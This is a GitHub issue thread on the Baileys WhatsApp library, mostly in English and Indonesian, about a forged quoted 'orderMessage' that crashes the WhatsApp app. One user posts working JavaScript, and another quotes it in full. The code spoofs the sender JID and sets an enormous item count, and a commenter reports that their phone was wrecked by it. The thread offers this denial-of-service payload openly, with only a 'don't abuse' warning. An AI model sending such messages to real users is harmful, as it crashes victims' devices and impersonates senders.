### ISSUE TITLE
[BUG] fake quoted order message

### ISSUE THREAD

**Issue by Nurutomo** [adiwajshing/Baileys#419]
I don't know if this is WhatsApp bug, or Baileys bug

Its like this, but with 9999 items
![image](https://user-images.githubusercontent.com/18616827/112633359-d7e9ca00-8e6b-11eb-9de8-3dcacdce7153.png)

I don't share the code, because this will crash WhatsApp

text me on discord `Nurutomo #6541` for more info

**Comment by yusufusta** [comment]
This cannot be Baileys bug because Baileys cannot interfere with Whatsapp.

this is a WhatsApp bug so you can share your code.

**Comment by Nurutomo** [comment]
# Don't abuse this code

```js
conn.sendMessage(m.key.remoteJid, 'Replied to quoted orderMessage', MessageType.extendedText, {
 quoted: {
  key: {
   participant: '0@s.whatsapp.net' // Fake sender Jid
  },
  message: {
   orderMessage: {
    itemCount: 9999999, // Bug
    status: 1,
    surface: 1,
    message: 'Test',
    orderTitle: '𝙉𝙪𝙧𝙪𝙩𝙤𝙢𝙤', // Idk what this does
    sellerJid: '0@s.whatsapp.net' // Seller
   }
  }
 }
})
```

**Comment by RizqiTatsumaki** [comment]
> # Don't abuse this code
> ```js
> conn.sendMessage(m.key.remoteJid, 'Replied to quoted orderMessage', MessageType.extendedText, {
>  quoted: {
>   key: {
>    participant: '0@s.whatsapp.net' // Fake sender Jid
>   },
>   message: {
>    orderMessage: {
>     itemCount: 9999999, // Bug
>     status: 1,
>     surface: 1,
>     message: 'Test',
>     orderTitle: '𝙉𝙪𝙧𝙪𝙩𝙤𝙢𝙤', // Idk what this does
>     sellerJid: '0@s.whatsapp.net' // Seller
>    }
>   }
>  }
> })
> ```

kenapa bang :) hancur hp ku

**Comment by FaizBastomi** [comment]
I will up this issues

**Comment by adiwajshing** [comment]
@Nurutomo I believe this is a fairly well known problem. It was described in an earlier issue on this repo (#23) and in 2019 [here](https://i.blackhat.com/USA-19/Wednesday/us-19-Zaikin-Reverse-Engineering-WhatsApp-Encryption-For-Chat-Manipulation-And-More.pdf).

**Comment by fauzanAlvaroJuliano12** [comment]
Bug yang sangat merugikan, kenapa harus di sebar luaskan tuh code javs nya :')

**Comment by FaizBastomi** [comment]
it's WhatsApp bug not Baileys, ok

**Comment by yogipw** [comment]
Bug wa paling membagongkan

**Comment by rayyreall** [comment]
> Bug wa paling membagongkan

okelah

**Comment by DielGanz** [comment]
I hope this bug will be fixed soon

**Comment by RDTUTORIAL** [comment]
delete issues nya lah cokkkkkk, vangke

**Comment by FadliDarmawan** [comment]
> delete issues nya lah cokkkkkk, vangke
> 
> 

Kan dah di kasih peringatan **"Don't abuse this code"**

Cuma ya jaman sekarang mah...

**Comment by TheGetsuzoThunder** [comment]
Disalah gunakan bisa:v

> > delete issues nya lah cokkkkkk, vangke
> 
> Kan dah di kasih peringatan **"Don't abuse this code"**
> 
> Cuma ya jaman sekarang mah...

**Comment by FadliDarmawan** [comment]
> Disalah gunakan bisa:v
> 
> > > delete issues nya lah cokkkkkk, vangke
> > 
> > 
> > Kan dah di kasih peringatan **"Don't abuse this code"**
> > Cuma ya jaman sekarang mah...

iya juga sih aaowakwaw
